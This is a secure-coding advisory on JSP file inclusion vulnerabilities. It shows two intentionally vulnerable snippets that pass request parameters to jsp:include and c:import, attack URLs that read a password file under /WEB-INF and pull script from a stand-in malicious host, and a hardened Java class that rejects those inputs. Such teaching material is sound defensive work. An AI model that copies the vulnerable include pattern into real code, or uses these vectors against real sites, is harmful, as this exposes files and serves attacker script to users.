ABSTRACT

Allowing unvalidated user input to control files that are included dynamically in a JSP can lead to malicious code execution.

EXPLANATION

Many modern web scripting languages enable code re-use and modularization through the ability to include additional source files within one encapsulating file. This ability is often used to apply a standard look and feel to an application (templating), share functions without the need for compiled code, or break the code into smaller more manageable files. Included files are interpreted as part of the parent file and executed in the same manner. File inclusion vulnerabilities occur when the path of the included file is controlled by unvalidated user input.

Example 1: The following is an example of a Local File Inclusion vulnerability. The sample code takes a user-specified template name straight from the request and includes it in the JSP page to be rendered.


...
<%-- "template" comes straight from the query string; nothing validates it --%>
<jsp:include page='<%= request.getParameter("template") %>' />
...

If the attacker hands the dynamic include statement the path of any resource that exists in the web application, the contents of that resource are passed to the JSP interpreter and rendered into the page.

In the case of an attack vector of the form

specialpage.jsp?template=/WEB-INF/database/passwordDB

the server-side include reads /WEB-INF/database/passwordDB and writes its contents into the rendered page, thus compromising the security of the system. Note that resources under /WEB-INF/ are never served to direct browser requests, but a server-side include (a RequestDispatcher include underneath jsp:include) is not subject to that restriction, so the restricted file is disclosed anyway.

Worse, if the include mechanism accepts a URL to a remote site controlled by the attacker, the page will embed whatever content the attacker chooses to serve. The server makes the outbound request itself, and the attacker then decides what is delivered to, and executed in, the browser of every user who loads the page.

Example 2: An example of a Remote File Inclusion vulnerability is shown below. The sample code uses the JSTL c:import tag to import a user-specified remote resource into the current JSP page.

...
<%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core" %>
<%-- "privacy" is an attacker-chosen URL; c:import fetches it server-side and inlines the response --%>
<c:import url='<%= request.getParameter("privacy") %>' />
...

An attack vector of the form

policy.jsp?privacy=http://www.malicioushost.com/attackdata.js

causes the server to fetch attackdata.js from the attacker's host and write its contents into the current JSP page, so attacker-supplied script or markup is served to every user of the page from a site the application does not control.
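Both examples share one root cause: the include target is assembled from raw request input. The class below is example code added here, not Fortify's or the original page's code; it shows the hardened form for both Example 1 (the jsp:include template) and Example 2 (the c:import URL). The request parameter is treated as a key into a closed map of developer-chosen targets, so the include tag never sees attacker-controlled text. The class name SafeInclude, the /WEB-INF/templates/ directory, the policy.example.com host and the key names are all assumptions made for the example.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Map;
import java.util.Set;
import java.util.regex.Pattern;

/**
 * Added example (not the page's or Fortify's code): resolves the "template"
 * and "privacy" request parameters to fixed include targets before any
 * jsp:include or c:import runs. Paths, hosts and keys below are assumed.
 *
 * Intended JSP usage (assumed page names):
 *   <jsp:include page='<%= SafeInclude.templatePath(request.getParameter("template")) %>' />
 *   <c:import url='<%= SafeInclude.policyUrl(request.getParameter("privacy")) %>' />
 */
public final class SafeInclude {

    // Strategy A (preferred): closed map from short key to developer-chosen target.
    private static final Map<String, String> TEMPLATES = Map.of(
            "default", "/WEB-INF/templates/default.jsp",
            "compact", "/WEB-INF/templates/compact.jsp");

    private static final Map<String, String> POLICY_URLS = Map.of(
            "eu", "https://policy.example.com/privacy/eu.html",
            "us", "https://policy.example.com/privacy/us.html");

    // Strategy B (when names must be dynamic): one path segment of safe
    // characters, a fixed extension, and a containment check after normalisation.
    private static final Path TEMPLATE_DIR = Paths.get("/WEB-INF/templates");
    private static final Pattern SAFE_NAME = Pattern.compile("[A-Za-z0-9_-]{1,64}");

    // Strategy C (when a URL really must vary): pin scheme and host.
    private static final Set<String> ALLOWED_HOSTS = Set.of("policy.example.com");

    private SafeInclude() {}

    /** Maps a template key to its context-relative include path, or throws. */
    public static String templatePath(String key) {
        String path = key == null ? null : TEMPLATES.get(key);
        if (path == null) throw new IllegalArgumentException("unknown template: " + key);
        return path;
    }

    /** Maps a policy key to a fixed URL; the browser never supplies a URL. */
    public static String policyUrl(String key) {
        String url = key == null ? null : POLICY_URLS.get(key);
        if (url == null) throw new IllegalArgumentException("unknown policy: " + key);
        return url;
    }

    /** Dynamic variant: builds /WEB-INF/templates/<name>.jsp or throws. */
    public static String dynamicTemplatePath(String name) {
        if (name == null || !SAFE_NAME.matcher(name).matches()) {
            throw new IllegalArgumentException("bad template name: " + name);
        }
        Path target = TEMPLATE_DIR.resolve(name + ".jsp").normalize();
        // SAFE_NAME already excludes '/', '\' and '.', so this only matters if
        // the pattern is loosened later; it is cheap, so keep it.
        if (!target.startsWith(TEMPLATE_DIR)) {
            throw new IllegalArgumentException("template outside base dir");
        }
        return target.toString().replace('\\', '/');
    }

    /** URL variant: only https to an allowlisted host, no embedded credentials. */
    public static String checkedPolicyUrl(String raw) {
        URI uri;
        try {
            uri = new URI(raw).normalize();
        } catch (URISyntaxException | NullPointerException e) {
            throw new IllegalArgumentException("malformed url");
        }
        if (!"https".equals(uri.getScheme()) || uri.getHost() == null
                || uri.getUserInfo() != null
                || !ALLOWED_HOSTS.contains(uri.getHost().toLowerCase())) {
            throw new IllegalArgumentException("url not allowed: " + raw);
        }
        return uri.toString();
    }

    public static void main(String[] args) {
        System.out.println(templatePath("default"));          // /WEB-INF/templates/default.jsp
        System.out.println(policyUrl("eu"));                  // https://policy.example.com/privacy/eu.html
        System.out.println(dynamicTemplatePath("compact"));   // /WEB-INF/templates/compact.jsp

        // The two attack vectors from this page, plus a traversal, are rejected
        // before any include runs.
        String[] attacks = {
            "/WEB-INF/database/passwordDB",
            "../database/passwordDB",
            "http://www.malicioushost.com/attackdata.js"
        };
        for (String a : attacks) {
            try {
                dynamicTemplatePath(a);
                System.out.println("ACCEPTED (bug): " + a);
            } catch (IllegalArgumentException e) {
                System.out.println("rejected: " + e.getMessage());
            }
            try {
                checkedPolicyUrl(a);
                System.out.println("ACCEPTED (bug): " + a);
            } catch (IllegalArgumentException e) {
                System.out.println("rejected: " + e.getMessage());
            }
        }
    }
}
```

Strategy A is the one to reach for first: a map of keys removes the attacker's influence over the path entirely, and the include still works for resources under /WEB-INF/ because the container resolves the fixed path server-side. Strategies B and C exist for the cases where a key map is impractical, and both deliberately reject anything that is not a single bare name or an https URL on a known host rather than trying to strip traversal sequences out of hostile input.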

REFERENCES

[1] Standards Mapping - OWASP Top 10 2010 - (OWASP 2010) A1 Injection

[2] Standards Mapping - OWASP Top 10 2004 - (OWASP 2004) A1 Unvalidated Input

[3] Standards Mapping - OWASP Top 10 2007 - (OWASP 2007) A3 Malicious File Execution

[4] Standards Mapping - Security Technical Implementation Guide Version 3 - (STIG 3) APP3510 CAT I, APP3600 CAT II

[5] Standards Mapping - Common Weakness Enumeration - (CWE) CWE ID 94, CWE ID 98

[6] Standards Mapping - Payment Card Industry Data Security Standard Version 1.2 - (PCI 1.2) Requirement 6.3.1.1, Requirement 6.5.3

[7] Standards Mapping - Payment Card Industry Data Security Standard Version 1.1 - (PCI 1.1) Requirement 6.5.1

[8] Standards Mapping - Payment Card Industry Data Security Standard Version 2.0 - (PCI 2.0) Requirement 6.5.8

[9] Standards Mapping - SANS Top 25 2009 - (SANS 2009) Risky Resource Management - CWE ID 094

[10] Standards Mapping - SANS Top 25 2010 - (SANS 2010) Risky Resource Management - CWE ID 098

[11] Standards Mapping - FIPS200 - (FISMA) SI